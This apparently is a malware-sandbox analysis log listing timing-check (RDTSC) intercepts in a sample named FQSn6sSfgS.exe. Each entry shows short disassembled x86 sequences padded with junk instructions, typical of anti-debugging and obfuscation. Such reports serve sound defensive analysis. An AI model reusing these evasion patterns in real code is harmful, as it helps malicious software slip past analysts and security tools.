Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB1D3 second address: FEB216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, 5C5D7CC4h 0x00000015 push 00000000h 0x00000017 mov di, C7ADh 0x0000001b push D586E370h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FB19901BD19h 0x00000028 ja 00007FB19901BD06h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB216 second address: FEB21B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB21B second address: FEB253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 2A791D10h 0x0000000e mov edi, ebx 0x00000010 push 00000003h 0x00000012 push esi 0x00000013 push ebx 0x00000014 push ecx 0x00000015 pop edi 0x00000016 pop ecx 0x00000017 pop edx 0x00000018 push 00000000h 0x0000001a movzx esi, si 0x0000001d push 00000003h 0x0000001f sbb edi, 2C061513h 0x00000025 call 00007FB19901BD09h 0x0000002a push eax 0x0000002b push edx 0x0000002c jns 00007FB19901BD08h 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB253 second address: FEB29C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007FB19901BDF2h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jnc 00007FB19901BDE0h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB29C second address: FEB2BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 jmp 00007FB19901BD0Ch 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB2BB second address: FEB2DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D37FDh], esi 0x0000000e lea ebx, dword ptr [ebp+1244FECFh] 0x00000014 sub dword ptr [ebp+122D3B19h], edi 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB348 second address: FEB3B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+122D2D65h], ebx 0x00000012 push 00000000h 0x00000014 call 00007FB19901BD09h 0x00000019 jmp 00007FB19901BD0Fh 0x0000001e push eax 0x0000001f pushad 0x00000020 pushad 0x00000021 jmp 00007FB19901BD0Eh 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 jmp 00007FB19901BD16h 0x0000002e popad 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB3B0 second address: FEB448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edi 0x0000000e jo 00007FB19901BDDCh 0x00000014 jns 00007FB19901BDD6h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 jmp 00007FB19901BDE6h 0x00000025 je 00007FB19901BDD8h 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e pop eax 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007FB19901BDD8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 sbb cx, 23DAh 0x0000004e jbe 00007FB19901BDDCh 0x00000054 push 00000003h 0x00000056 mov edx, dword ptr [ebp+122D38F4h] 0x0000005c push 00000000h 0x0000005e movsx esi, si 0x00000061 push 00000003h 0x00000063 add ecx, dword ptr [ebp+122D2A4Dh] 0x00000069 push BC9E789Dh 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FB19901BDDCh 0x00000075 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB448 second address: FEB44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB44E second address: FEB452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB452 second address: FEB456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FFC26F second address: FFC273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FFC273 second address: FFC294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB19901BD0Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1009A35 second address: 1009A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1009A39 second address: 1009A3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1009BAA second address: 1009BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB19901BDD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1009BB7 second address: 1009BEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FB19901BD16h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 100A30C second address: 100A319 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 100A4A1 second address: 100A4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 100A774 second address: 100A7A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB19901BDE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FB19901BDDCh 0x00000014 push eax 0x00000015 jno 00007FB19901BDD6h 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 100A7A1 second address: 100A7A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 100AB68 second address: 100AB84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 100B438 second address: 100B445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FB19901BD06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 100B84B second address: 100B851 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD6E88 second address: FD6EAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB19901BD0Dh 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD6EAC second address: FD6EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD6EB0 second address: FD6EBA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB19901BD06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD6EBA second address: FD6ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB19901BDE4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1011FDA second address: 1011FE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1011FE7 second address: 1011FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB19901BDD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1011FF2 second address: 1011FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101243E second address: 101244A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101244A second address: 1012466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BD14h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10125A4 second address: 10125BF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB19901BDDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007FB19901BDE4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018048 second address: 101804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101804C second address: 101805A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FB19901BDD8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101805A second address: 1018066 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB19901BD0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018066 second address: 1018080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB19901BDDEh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018080 second address: 1018093 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB19901BD0Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018093 second address: 10180B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDE8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10180B2 second address: 10180C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 js 00007FB19901BD0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017483 second address: 10174B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDE2h 0x00000008 jmp 00007FB19901BDE9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017762 second address: 101777E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD12h 0x00000007 jp 00007FB19901BD06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101777E second address: 1017783 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101792F second address: 1017934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017CF9 second address: 1017CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017CFD second address: 1017D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FB19901BD08h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017D0B second address: 1017D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDDh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017EB7 second address: 1017EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018FB6 second address: 1018FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB19901BDD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018FC1 second address: 1018FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018FC7 second address: 1018FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101908A second address: 10190A2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB19901BD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007FB19901BD0Eh 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10190A2 second address: 10190E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FB19901BDE8h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FB19901BDE9h 0x00000018 jmp 00007FB19901BDE3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10190E0 second address: 10190E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10191CD second address: 10191D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10191D1 second address: 10191DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101947B second address: 1019489 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019489 second address: 101948D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019B3F second address: 1019B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019B43 second address: 1019B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019D4C second address: 1019D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019D52 second address: 1019D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A087 second address: 101A0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FB19901BDD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A0A9 second address: 101A0B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A11C second address: 101A121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A121 second address: 101A131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BD0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A131 second address: 101A169 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov di, bx 0x00000010 xchg eax, ebx 0x00000011 push ecx 0x00000012 jmp 00007FB19901BDE0h 0x00000017 pop ecx 0x00000018 push eax 0x00000019 je 00007FB19901BDEEh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB19901BDDCh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A673 second address: 101A6F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FB19901BD15h 0x00000010 nop 0x00000011 or edi, 13CDB2C1h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FB19901BD08h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov dword ptr [ebp+1245EBA0h], edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FB19901BD08h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A6F5 second address: 101A6F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A6F9 second address: 101A717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB19901BD10h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101C0FA second address: 101C100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101B8A1 second address: 101B8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101CAF4 second address: 101CB17 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB19901BDD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB19901BDE4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101D4D6 second address: 101D547 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FB19901BD0Ah 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FB19901BD08h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D29B5h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FB19901BD08h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push 00000000h 0x00000053 mov di, 274Fh 0x00000057 xchg eax, ebx 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop ecx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101D547 second address: 101D55C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB19901BDDBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101DF9A second address: 101DFA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101F6D9 second address: 101F6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101DD3E second address: 101DD60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
